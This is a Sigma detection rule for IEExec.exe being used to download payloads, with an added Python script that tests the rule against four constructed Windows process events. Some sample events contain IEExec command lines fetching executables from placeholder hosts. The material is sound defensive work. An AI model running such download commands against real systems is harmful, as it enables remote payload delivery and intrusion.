Abusing IEExec To Download Payloads
Detects execution of the IEExec utility to download payloads
Sigma rule
title: Abusing IEExec To Download Payloads
id: 9801abb8-e297-4dbf-9fbd-57dde0e830ad
status: experimental
description: Detects execution of the IEExec utility to download payloads
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Ieexec/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022/05/16
tags:
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    lolbas:
        - Image|endswith: '\IEExec.exe'
        - OriginalFileName: 'IEExec.exe'
    remote:
        CommandLine|contains:
            - 'https://'
            - 'http://'
    condition: lolbas and remote
falsepositives:
    - Unknown
level: high
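The rule's logic, written out as plain Python and run over a handful of constructed process_creation events, so the matching semantics are explicit: the `lolbas` block is a list of maps, so its two entries are OR-ed; the `remote` block is a `contains` with a list of values, also OR-ed; the condition ANDs the two; and Sigma string matching (`endswith`, `contains`, plain equality) is case-insensitive. This is an added example, not code from the SigmaHQ repository or from any Sigma backend, and the four events are constructed for illustration, not real telemetry.

```python
"""Evaluate the 'Abusing IEExec To Download Payloads' Sigma logic over
constructed process_creation events.

Added example: not part of the SigmaHQ rule or its tooling. The sample
events below are constructed, not captured from a real host.
"""

# Selection values copied verbatim from the rule. In a plain Sigma string the
# backslash is literal, so '\IEExec.exe' anchors on the path separator and
# will not match e.g. 'NotIEExec.exe'.
LOLBAS_IMAGE_SUFFIX = "\\IEExec.exe"
LOLBAS_ORIGINAL_NAME = "IEExec.exe"
REMOTE_SCHEMES = ("https://", "http://")


def _lower(value):
    # Sigma's endswith/contains/equality matches are case-insensitive by
    # default; normalise both sides. Missing fields compare as empty strings.
    return (value or "").lower()


def lolbas_selection(event):
    """'lolbas' block: a list of two maps, so the entries are OR-ed."""
    image_match = _lower(event.get("Image")).endswith(LOLBAS_IMAGE_SUFFIX.lower())
    name_match = _lower(event.get("OriginalFileName")) == LOLBAS_ORIGINAL_NAME.lower()
    return image_match or name_match


def remote_selection(event):
    """'remote' block: CommandLine|contains with a list of values, OR-ed."""
    cmdline = _lower(event.get("CommandLine"))
    return any(scheme in cmdline for scheme in REMOTE_SCHEMES)


def rule_matches(event):
    """condition: lolbas and remote"""
    return lolbas_selection(event) and remote_selection(event)


# Constructed Sysmon Event ID 1 style records, using the field names the
# windows/process_creation log source exposes to Sigma.
SAMPLE_EVENTS = [
    {   # 1: textbook LOLBAS usage, should alert
        "Image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.exe",
        "OriginalFileName": "IEExec.exe",
        "CommandLine": r"IEExec.exe http://192.0.2.10:8080/update.exe",
    },
    {   # 2: binary copied and renamed to dodge Image matching; the PE version
        #    info (OriginalFileName) still identifies it, should alert
        "Image": r"C:\Users\Public\svc.exe",
        "OriginalFileName": "IEExec.exe",
        "CommandLine": r"svc.exe HTTPS://cdn.example.invalid/agent.exe",
    },
    {   # 3: IEExec pointed at a local path, no URL, should NOT alert
        "Image": r"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\IEExec.exe",
        "OriginalFileName": "IEExec.exe",
        "CommandLine": r"IEExec.exe C:\Temp\app.exe",
    },
    {   # 4: unrelated process with a URL on its command line, should NOT alert
        "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
        "OriginalFileName": "firefox.exe",
        "CommandLine": r'"firefox.exe" https://example.org/',
    },
]


def evaluate(events):
    """Return the 1-based indexes of the events the rule fires on."""
    return [i for i, ev in enumerate(events, start=1) if rule_matches(ev)]


if __name__ == "__main__":
    for idx in evaluate(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx - 1]
        print(f"ALERT event {idx}: {ev['Image']} -> {ev['CommandLine']}")
```

Two points worth noting when deploying the rule: the second selection only helps if your telemetry source actually populates `OriginalFileName` from the PE version resource (Sysmon does; some EDR process events do not), and event 3 shows that the rule is deliberately silent on IEExec launches with a local path, so it will not catch a payload that was staged to disk by some other means first.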
References
- https://lolbas-project.github.io/lolbas/Binaries/Ieexec/
Related rules
- Password Protected ZIP File Opened (Suspicious Filenames)
- Potential COM Objects Download Cradles Usage - PS Script
- Potential COM Objects Download Cradles Usage - Process Creation
- Potential DLL File Download Via PowerShell Invoke-WebRequest
- PowerShell Web Download